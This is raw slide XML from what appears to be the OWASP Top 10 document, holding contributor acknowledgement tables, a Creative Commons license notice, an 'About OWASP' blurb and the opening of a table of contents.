                        <a:t>We’d like to thank the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D05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5" name="Table 4">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20628691"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="119062" y="1814697"/>
          <a:ext cx="6619875" cy="3006090"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1323975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="440345039"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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MicroFocus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Fortify​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Veracode</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Synopsis​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Checkmarx</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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ContextIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="142073905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CDAC​</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Hidden​</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Colegio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> LaSalle Monteria​</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Linden Lab​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ITsec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Security Services </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>bv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2702957963"/>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EZI​</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Edgescan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Purpletalk</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AsTech</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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Network Test Labs Inc.​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="291575199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Derek Weeks​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TCS​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Easybss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I4 Consulting​</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ANCAP​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="324951646"/>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Branding Brand​</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Vantage Point​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EVRY​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iBLISS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Digital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Shape Security​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1054797462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Paladion Networks</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Secure Network​</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Web​</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Contrast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Hamed​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="127423078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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Khallaagh</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DDoS.com​</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Minded Security​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BUGemot</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Softtek​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1928526564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="361950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>M. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Limacher</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> IT</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Dienstleistungen</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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Osampa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>​</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Atos​</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National Center for Cyber Security Technology​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" fontAlgn="base">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SHCP​</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="942100138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A19514B-B0EA-4CF0-809D-97D7C4B7BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1047685343"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228599" y="6248400"/>
          <a:ext cx="6400800" cy="2499360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3884102497"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3477021267"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1190969635"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2705345571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1280160">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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ak47gen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davewichers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itscooper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ossie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>-git</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tghosth</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2073905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alonergan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drwetter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jeremylong</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PauloASilva</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thesp0nge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2957963"/>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anantshri</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ecbftw</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jmanico</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">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pontocom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toddgrotenhuis</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1575199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bchurchill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gilzow</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joaomatosf</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psiinon</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tsohlacol</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951646"/>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bkimminich</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h3xstream</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jrmithdobbs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raesene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vanderaj</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0480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Boberski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HoLyVieR</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jsteven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riramar</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vdbaan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4797462"/>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borischen</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ilatypov</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jvehent</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sslHello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yohgaki</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4230784"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t> Calico90</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infosecdad</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koto</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a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>stefanb</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Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>Frohoff</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74320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t> D00gs</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irbishop</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Neil-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>Smithline</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>taprootsec</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri" charset="0"/>
                      </a:endParaRP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171450" indent="-171450" algn="l" fontAlgn="b">
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" charset="0"/>
                        </a:rPr>
                        <a:t>Gabriel Lawrence</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="6350" marR="6350" marT="635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04771189"/>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54169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0"/>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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883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t>This document is released under the Creative Commons Attribution Share-Alike 4.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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489919879"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="992585"/>
          <a:ext cx="3352800" cy="6925861"/>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90820">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Table of Contents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35041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>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441620203"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="6927847"/>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74724">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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553123">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted.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At OWASP you'll find free and open</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRP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Application security tools and standards</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Complete books on application security testing, secure code development, and secure code review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>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Presentations and videos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Cheat sheets on many common topics</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Standard security controls and libraries</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Local chapters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Cutting edge research</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Extensive conferences worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mailing lists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Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="sng" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>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All of the OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. </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We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in these areas.</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The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter Leaders, Project Leaders, and project members. We support innovative security research with grants and infrastructure.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="4000" dirty="0"/>
              <a:t>TOC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1238492906"/>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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	TOC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About OWASP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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	FW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Foreword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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	I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Introduction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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	RN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Release Notes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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:tabLst>
                          <a:tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="2808000" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="Arial" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>	Risk	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
